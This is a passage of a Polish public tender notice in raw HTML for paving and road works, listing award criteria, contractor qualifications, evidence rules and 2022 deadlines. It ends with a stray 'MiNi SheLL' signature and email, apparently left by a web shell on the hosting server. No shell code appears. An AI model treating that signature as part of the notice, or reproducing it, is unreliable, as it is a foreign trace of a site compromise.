wody burzowej</p> <p class="mb-0">45233161-5 - Roboty budowlane w zakresie ścieżek pieszych</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">200 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji na przedmiot umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa<br/>Za minimalny poziom zdolności uznane zostanie, wykazanie przez Wykonawcę, że:<br/>nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wykonał w sposób należyty,<br/>zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej jedną robotę<br/>budowlaną o złożoności porównywalnej z zakresem niniejszego zamówienia, tj. polegającej na<br/>budowie, przebudowie, rozbudowie, remoncie, modernizacji dróg i/lub placów i lub chodników<br/>i/lub parkingów, o nawierzchni z kostki brukowej lub kostki brukowej betonowej i wartości nie<br/>mniejszej, niż 1 000 000,00 zł brutto [z uwzględnieniem wszystkich ewentualnych kosztów<br/>towarzyszących z tym związanych np. robót ziemnych, wykonanie podbudowy, wykonanie<br/>kanalizacji deszczowej itd.] – które zostały odebrane protokołem częściowym lub końcowym.<br/>Zamawiający nie określa, szczególnego sposobu spełniania określonego wyżej warunku, przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. (brak skorzystania z dyspozycji zawartej w art. 117 ust. 1 ustawy Pzp)<br/>Uwagi:<br/>1. Pojęcie budowa, przebudowa, rozbudowa, remont należy rozumieć zgodnie z przepsiami ustawy z dnia 7 lipca 1994 r. - Prawa Budowlane (tekst jednolity Dz. U. 2020 poz 1333. ze zm.) Pojęcie modernizcja mieści się w pojęciu przebudowa, rozbudowa albo remont.<br/>2. W przypadku, gdy roboty referencyjne w rzeczywistości były wykonywane przez Wykonawcę w ramach konsorcjum wraz z innym Wykonawcą lub Wykonawcami, należy w Wykazie robót, wskazać, jakie czynności w ramach tych robót były wykonywane przez Wykonawcę ubiegającego się o niniejsze zamówienie. Faktyczny wkład konsorcjanta w prowadzeniu działań może polegać na osobistym wykonaniu robót, ale także zarządzanie i administrowanie robotami może wystarczyć do powołania się na doświadczenie nabyte w toku ich realizacji.<br/>3. Jeżeli zakres robót przedstawionych w dokumencie złożonym na potwierdzenie, że roboty budowlane zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone jest szerszy od powyżej określonego przez Zamawiającego należy w wykazie<br/>robót budowlanych podać wartość robót odpowiadających zakresowi warunku.<br/>4. W przypadku wskazania przez Wykonawcę, w celu wykazania spełniania warunków udziału, waluty<br/>innej niż polska (PLN), w celu jej przeliczenia stosowany będzie średni kurs NBP na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych na portalu internetowym Urzędu Zamówień Publicznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania braku podstaw<br/>(przesłanek) wykluczenia z postępowania, na podstawie art. 274 ust. 1 ustawy Pzp zostanie<br/>wezwany do złożenia następujących podmiotowych środków dowodowych (aktualnych na<br/>dzień ich złożenia):<br/>• oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do<br/>tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który<br/>złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału<br/>w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz<br/>z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej<br/>ub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej.<br/>UWAGA: W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie<br/>w zakresie pkt 5.1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełniania warunków udziału w postępowaniu (określonych przez Zamawiającego w pkt 3 rozdziału III SWZ), na<br/>podstawie art. 274 ust. 1 ustawy Pzp zostanie wezwany do złożenia następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/>- wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów – inne odpowiednie dokumenty.<br/>Uwagi:<br/>1) Wykaz należy złożyć zgodnie ze wzorem stanowiącym załącznik nr 8 do SWZ<br/>2) Na potrzeby niniejszego postępowania wystarczające będzie wskazanie w wykazie: rodzaju,<br/>daty i miejsca wykonania, wartości oraz podmiotów na rzecz których roboty wskazane<br/>w wykazie zostały wykonane</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W przypadku zastosowania materiałów, urządzeń, wyrobów lub rozwiązań równoważnych<br/>w rozumieniu art. 99 ust. 5 lub art. 101 ust. 4 ustawy, Wykonawca zobowiązany jest do ich wskazania<br/>w ofercie oraz do złożenia wraz z ofertą kart technicznych lub innych dokumentów potwierdzających,<br/>że oferowana oferta/rozwiązania równoważne spełniają wymagania Zamawiającego opisane<br/>w przedmiocie zamówienia <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia są zobowiązani do ustanowienia<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania<br/>ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego -<br/>nie dotyczy spółki cywilnej, o ile upoważnienie / pełnomocnictwo do występowania w imieniu<br/>tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie<br/>z pełnomocnikiem.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz<br/>z ofertą stosowne pełnomocnictwo – zgodnie z pkt 6.3. rozdz. X SWZ – nie dotyczy spółki<br/>cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika<br/>z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Uwaga: Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą<br/>nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców<br/>występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>6. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców<br/>oświadczenie, o którym mowa w art. 125 ustawy (ust. 6.1. rozdziału X SWZ) zgodnie<br/>z załącznikiem nr 2 do SWZ składa każdy z Wykonawców wspólnie ubiegających<br/>się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu<br/>w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje<br/>spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia -<br/>każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać<br/>wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia.<br/>Powyższe oznacza, iż:<br/>- Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia;<br/>- Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu<br/>do danego warunku udziału w postępowaniu potwierdza jego spełnianie; dopuszcza<br/>się oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające<br/>ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/>7. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym<br/>jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>8. W przypadku, o którym mowa w art. 117 ust. 2 lub ust. 3 ustawy Pzp, Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do oferty oświadczenie,<br/>o którym mowa w art. 117 ust. 4 ustawy Pzp („ (...), z którego wynika które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.”) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy stanowią załącznik nr 4 do SWZ.<br/>2. Złożenie oferty jest jednoznaczne z akceptacją przez Wykonawcę projektowanych postanowień umowy.<br/>3. Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w oparciu o art. 455 ust. 1 oraz<br/>ust. 2 ustawy Pzp oraz w przypadkach określonych w załączniku nr 4 do SWZ tzw. „zmiany<br/>kontraktowe”. Szczególne informacje na temat zmian umowy zostały opisane w projektowanych<br/>postanowieniach umownych stanowiących załącznik do SWZ.<br/>4. Przed zawarciem umowy należy dopełnić formalności, które zostały wskazane w rozdziale XVII SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-10 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Systemu e-ZP pod adresem https://e-zp.pyskowice.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-10 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-08</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com